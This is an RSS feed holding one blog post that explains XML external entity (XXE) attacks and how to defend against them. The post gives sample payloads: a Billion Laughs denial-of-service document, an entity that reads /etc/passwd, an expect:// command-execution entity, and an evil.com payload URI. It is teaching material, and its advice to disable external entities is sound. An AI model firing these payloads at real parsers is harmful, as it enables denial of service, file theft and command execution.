<?xml version="1.0" encoding="utf-8" standalone="yes" ?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Cave Confessions</title>
    <link>//caveconfessions.com/tags/xml/index.xml</link>
    <description>Recent content on Cave Confessions</description>
    <generator>Hugo -- gohugo.io</generator>
    <language>en-us</language>
    <copyright>All rights reserved - 2018</copyright>
    <atom:link href="//caveconfessions.com/tags/xml/index.xml" rel="self" type="application/rss+xml" />
    
    <item>
      <title>XXE - The Ugly Side of XML</title>
      <link>//caveconfessions.com/xxe-ugly-side-of-xml/</link>
      <pubDate>Sat, 06 Feb 2016 16:00:00 -0600</pubDate>
      
      <guid>//caveconfessions.com/xxe-ugly-side-of-xml/</guid>
      <description>&lt;p&gt;The eXtensible Markup Language (XML) has a very long and lustrious reputation
for being he go-to language for storing and transferring self describing data.
Unfortunately though, XML&amp;rsquo;s root have presented a problem that can plauge many
improperly configured parsers. This problem is known as eXternal XML Entity
attacks (XXE).&lt;/p&gt;

&lt;p&gt;&lt;/p&gt;

&lt;h2 id=&#34;extensible-markup-language-xml&#34;&gt;Extensible Markup Language (XML)&lt;/h2&gt;

&lt;p&gt;&lt;a href=&#34;https://en.wikipedia.org/wiki/XML&#34;&gt;Extensible Markup Language (XML)&lt;/a&gt; is
designed to be a markup language that expresses data in a format that is both
human and machine readable. It is defined by the
&lt;a href=&#34;https://www.w3.org/TR/REC-xml/&#34;&gt;W3C&amp;rsquo;s XML 1.0 Specification&lt;/a&gt;. XML is actually
a subset of the &lt;a href=&#34;https://en.wikipedia.org/wiki/Standard_Generalized_Markup_Language&#34;&gt;Standard Generalized Markup Language
(SGML)&lt;/a&gt; and
it is from this specification that XML inherited the &lt;a href=&#34;https://en.wikipedia.org/wiki/Document_type_definition&#34;&gt;Document Type Definition
(DTD)&lt;/a&gt;. DTD is a
language that allows for the definition of the schema used within an XML
document. This is an example of an XML document used to define the layout of
web page (XHTML) that includes the DTD header that is used to define the
acceptable tags in the page:&lt;/p&gt;

&lt;pre&gt;&lt;code class=&#34;language-xml&#34;&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;
&amp;lt;!DOCTYPE html PUBLIC
	&amp;quot;-//W3C//DTD XHTML 1.0 Transitional//EN&amp;quot;
	&amp;quot;DTD/xhtml1-transitional.dtd&amp;quot;&amp;gt;
&amp;lt;html
	xmlns=&amp;quot;http://www.w3.org/1999/xhtml&amp;quot;
	xml:lang=&amp;quot;en&amp;quot; lang=&amp;quot;en&amp;quot;&amp;gt;
	&amp;lt;head&amp;gt;
		&amp;lt;title&amp;gt;Page Title&amp;lt;/title&amp;gt;
	&amp;lt;/head&amp;gt;

	&amp;lt;body bgcolor=&amp;quot;#FFFFFF&amp;quot; link=&amp;quot;#000000&amp;quot; text=&amp;quot;red&amp;quot;&amp;gt;
		&amp;lt;p&amp;gt;Page Content&amp;lt;/p&amp;gt;
	&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;h2 id=&#34;document-type-definition-dtd&#34;&gt;Document Type Definition (DTD)&lt;/h2&gt;

&lt;p&gt;The Document Type Definition (DTD) defines the building blocks of the XML
document. It does this by laying out the acceptable elements and attributes
allowed in the document. This definition can be made either inline (in the
document), or held in an external document.&lt;/p&gt;

&lt;p&gt;DTD contains another definition type called ENTITY. The entity definition works
like a variable or a macro, in that it will allow for the definition of large
or unwieldy data that can be stored in a single variable that can be used in
several places within the document. There are two ways to use this definition.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;&amp;lt;!ENTITY author &amp;quot;Joshua Barone&amp;quot; &amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;This would allow for the substitution to be used in the document.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;&amp;lt;name&amp;gt;&amp;amp;author;&amp;lt;/name&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Which would be rendered as:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;&amp;lt;name&amp;gt;Joshua Barone&amp;lt;/name&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;There is also the ability to make a parameter definition. These simply add the
&lt;code&gt;%&lt;/code&gt; character to denote the type:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;&amp;lt;!ENTITY % author &amp;quot;Joshua Barone&amp;quot; &amp;gt;
&amp;lt;!ENTITY % awesome &amp;quot;&amp;amp;author; is awesome!&amp;quot; &amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;This would be used as before:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;&amp;lt;message&amp;gt;&amp;amp;awesome;&amp;lt;message&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Which would be rendered as:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;&amp;lt;message&amp;gt;Joshua Barone is awesome!&amp;lt;/message&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;The magic that happened here with the parameter definition is that it&amp;rsquo;s Content
could be used in the definition of another entity. This will become important
later.&lt;/p&gt;

&lt;h2 id=&#34;the-attack&#34;&gt;The Attack&lt;/h2&gt;

&lt;p&gt;All of this was lead up to the actual attack. The  XML eXternal Entity (XXE)
attacks work my leveraging the fact that DTD entities can be defined in an
external source. These external definitions are defined by using the SYSTEM
attribute to denote that the document is to be parsed and included. These
definitions have the following syntax:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;&amp;lt;!ENTITY name SYSTEM &amp;quot;uri&amp;quot; &amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Where name specifies the name of the entity that will hold the contents of the
parsed document, and uri refers to the URI where the document can be found.
Because it is a URI that is used, is where the danger really lies. The URI can
be used to reference all of the following:&lt;/p&gt;

&lt;dl&gt;
&lt;dt&gt;Payload Document&lt;/dt&gt;
&lt;dd&gt;A document where a more complex XXE attack can be staged
`http://evil.com/payload.dtd`&lt;/dd&gt;
&lt;dt&gt;Local File&lt;/dt&gt;
&lt;dd&gt;Reference any document stored on the local machine that the current user
context has access to. `file:///etc/passwd`&lt;/dd&gt;
&lt;dt&gt;Filters&lt;/dt&gt;
&lt;dd&gt;Languages like php, java, and others provide specific syntax for defining
filters in the URI `php://filter/convert.base64-encode/resource=index.php`
&lt;/dl&gt;

&lt;p&gt;And there are others. The only limitation is in the imagination to abuse the URI.&lt;/p&gt;

&lt;h3 id=&#34;billion-laughs-attack&#34;&gt;Billion Laughs Attack&lt;/h3&gt;

&lt;p&gt;The Billion Laughs Attack is a simple denial of service (DOS) style of attack
using XXEs. It works by using the expansion properties of the DTD language.&lt;/p&gt;

&lt;pre&gt;&lt;code class=&#34;language-xml&#34;&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;
&amp;lt;!DOCTYPE lolz [
 &amp;lt;!ENTITY lol &amp;quot;lol&amp;quot;&amp;gt;
 &amp;lt;!ELEMENT lolz (#PCDATA)&amp;gt;
 &amp;lt;!ENTITY lol1 &amp;quot;&amp;amp;lol;&amp;amp;lol;&amp;amp;lol;&amp;amp;lol;&amp;amp;lol;&amp;amp;lol;&amp;amp;lol;&amp;amp;lol;&amp;amp;lol;&amp;amp;lol;&amp;quot;&amp;gt;
 &amp;lt;!ENTITY lol2 &amp;quot;&amp;amp;lol1;&amp;amp;lol1;&amp;amp;lol1;&amp;amp;lol1;&amp;amp;lol1;&amp;amp;lol1;&amp;amp;lol1;&amp;amp;lol1;&amp;amp;lol1;&amp;amp;lol1;&amp;quot;&amp;gt;
 &amp;lt;!ENTITY lol3 &amp;quot;&amp;amp;lol2;&amp;amp;lol2;&amp;amp;lol2;&amp;amp;lol2;&amp;amp;lol2;&amp;amp;lol2;&amp;amp;lol2;&amp;amp;lol2;&amp;amp;lol2;&amp;amp;lol2;&amp;quot;&amp;gt;
 &amp;lt;!ENTITY lol4 &amp;quot;&amp;amp;lol3;&amp;amp;lol3;&amp;amp;lol3;&amp;amp;lol3;&amp;amp;lol3;&amp;amp;lol3;&amp;amp;lol3;&amp;amp;lol3;&amp;amp;lol3;&amp;amp;lol3;&amp;quot;&amp;gt;
 &amp;lt;!ENTITY lol5 &amp;quot;&amp;amp;lol4;&amp;amp;lol4;&amp;amp;lol4;&amp;amp;lol4;&amp;amp;lol4;&amp;amp;lol4;&amp;amp;lol4;&amp;amp;lol4;&amp;amp;lol4;&amp;amp;lol4;&amp;quot;&amp;gt;
 &amp;lt;!ENTITY lol6 &amp;quot;&amp;amp;lol5;&amp;amp;lol5;&amp;amp;lol5;&amp;amp;lol5;&amp;amp;lol5;&amp;amp;lol5;&amp;amp;lol5;&amp;amp;lol5;&amp;amp;lol5;&amp;amp;lol5;&amp;quot;&amp;gt;
 &amp;lt;!ENTITY lol7 &amp;quot;&amp;amp;lol6;&amp;amp;lol6;&amp;amp;lol6;&amp;amp;lol6;&amp;amp;lol6;&amp;amp;lol6;&amp;amp;lol6;&amp;amp;lol6;&amp;amp;lol6;&amp;amp;lol6;&amp;quot;&amp;gt;
 &amp;lt;!ENTITY lol8 &amp;quot;&amp;amp;lol7;&amp;amp;lol7;&amp;amp;lol7;&amp;amp;lol7;&amp;amp;lol7;&amp;amp;lol7;&amp;amp;lol7;&amp;amp;lol7;&amp;amp;lol7;&amp;amp;lol7;&amp;quot;&amp;gt;
 &amp;lt;!ENTITY lol9 &amp;quot;&amp;amp;lol8;&amp;amp;lol8;&amp;amp;lol8;&amp;amp;lol8;&amp;amp;lol8;&amp;amp;lol8;&amp;amp;lol8;&amp;amp;lol8;&amp;amp;lol8;&amp;amp;lol8;&amp;quot;&amp;gt;
]&amp;gt;
&amp;lt;lolz&amp;gt;&amp;amp;lol9;&amp;lt;/lolz&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;This incredibly small amount of code (&amp;lt; 1KB) will expand to take up
approximately 3 gigabytes of memory. This happens due to the exponential growth
that is happening due to how the entities are defined. The single &lt;code&gt;lol9&lt;/code&gt; will
be replaced with 10 &lt;code&gt;lol8&lt;/code&gt; entities. Which are each replaced by 10 &lt;code&gt;lol7&lt;/code&gt;
entities. And so on it goes.&lt;/p&gt;

&lt;h3 id=&#34;file-exfiltration&#34;&gt;File Exfiltration&lt;/h3&gt;

&lt;p&gt;This attacks uses the external nature of the ENTITY to include a file on the
local system. Remember this is local to the system that is parsing the XML.&lt;/p&gt;

&lt;pre&gt;&lt;code class=&#34;language-xml&#34;&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;
&amp;lt;!DOCTYPE hacks [
 &amp;lt;!ENTITY passwd SYSTEM &amp;quot;file:///etc/passwd&amp;quot; &amp;gt;
]&amp;gt;
&amp;lt;hacks&amp;gt;&amp;amp;passwd;&amp;lt;/hacks&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;When this file is parsed, the hacks tags would contain the content of the
servers passwd file.&lt;/p&gt;

&lt;h3 id=&#34;remote-code-execution&#34;&gt;Remote Code Execution&lt;/h3&gt;

&lt;p&gt;If the server that has this vulnerability is php and has the expect plugin
installed, it may be open to even more insidious attacks. The expect pluginis
designed to allow for a php application to run command line commands and
interact with them. The plugin also allows for using the &lt;code&gt;expect://&lt;/code&gt; filter in
a URI. Which means that it can be used in the XXE attack.&lt;/p&gt;

&lt;pre&gt;&lt;code class=&#34;language-xml&#34;&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;
&amp;lt;!DOCTYPE hacks [
 &amp;lt;!ENTITY cmd SYSTEM &amp;quot;expect://id&amp;quot; &amp;gt;
]&amp;gt;
&amp;lt;hacks&amp;gt;&amp;amp;cmd;&amp;lt;/hacks&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;This would execute the &lt;code&gt;id&lt;/code&gt; command on the system and would place the results
inside the hacks tags. This would allow an attacker to know exactly what context
and prvilidges would be available for further commands or file requests.&lt;/p&gt;

&lt;h3 id=&#34;and-many-more&#34;&gt;And Many More&amp;hellip;&lt;/h3&gt;

&lt;p&gt;There are many other things that could be done by leveraging XXE attacks. These
could include &lt;a href=&#34;https://goo.gl/9em1lH&#34;&gt;Out-Of-Band attacks&lt;/a&gt;, that would still
allow for exfiltration even when the contents of the XML aren&amp;rsquo;t being reflected
back to the attacker. Or file uploads, which leverages attacks against Java
parsers that will download jar files with these attacks.&lt;/p&gt;

&lt;h2 id=&#34;defending&#34;&gt;Defending&lt;/h2&gt;

&lt;p&gt;To defend against this type of attack, it first needs to be understood what is
vulnerable. The vulnerabilities lie in the parsing of the XML. Here are a few
examples of where XML is being used and parsed:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;File Uploadss

&lt;ul&gt;
&lt;li&gt;Document Formats (OOXML, PDF, ODF, GXML, etc…)&lt;/li&gt;
&lt;li&gt;Configuration Files&lt;/li&gt;
&lt;li&gt;Image Formats (SVG, EXIF headers, etc…)&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;Network Protocols

&lt;ul&gt;
&lt;li&gt;SOAP&lt;/li&gt;
&lt;li&gt;XMLRPC&lt;/li&gt;
&lt;li&gt;REST&lt;/li&gt;
&lt;li&gt;XMPP&lt;/li&gt;
&lt;li&gt;SAML&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is an incomplete list as there are more scenarios that need to be
considered. That being considered, XXE defense comes down to one axiom.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Know thy parser&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Once XXE attacks became known about, three different approaches were taken
to solve the problem.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Don&amp;rsquo;t reflect the XML back to the user:&lt;/p&gt;

&lt;p&gt;This approach is a more naive approach to fix the problem. It assumes That
like the examples of above, the attack requires the inclusion of the attacking
entity into a tag, whose contents are reflected back to the attacker. But this
is certainly not the case. An attacker could make use of error messages,
differences in timing, and even Out-Of-Band attack vectors to achieve the
same ends.&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;Allow developers to disable external entity parsing:&lt;/p&gt;

&lt;p&gt;This solution is a great step in the correct direction. However, it is still
lacking. If the developers are not aware that this is something they even
need to be concerned about, then how would they know to go looking for the
feature that allows them to disable this.&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;External entity parsing disabled by default:&lt;/p&gt;

&lt;p&gt;This is the solution. There are a few notes here though.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Don&amp;rsquo;t turn it on&lt;/li&gt;
&lt;li&gt;Make sure the stay up to date / patched&lt;/li&gt;
&lt;li&gt;Use XSD instead of DTD for schema declarations.&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;If you are using a parser that relies on method #1, it would be best to change
parsers. If you are using a parser that relies on method #2 then all the
developers need to be aware of the dangers of XXE attacks and insure that
external parsing is turned off.&lt;/p&gt;</description>
    </item>
    
  </channel>
</rss>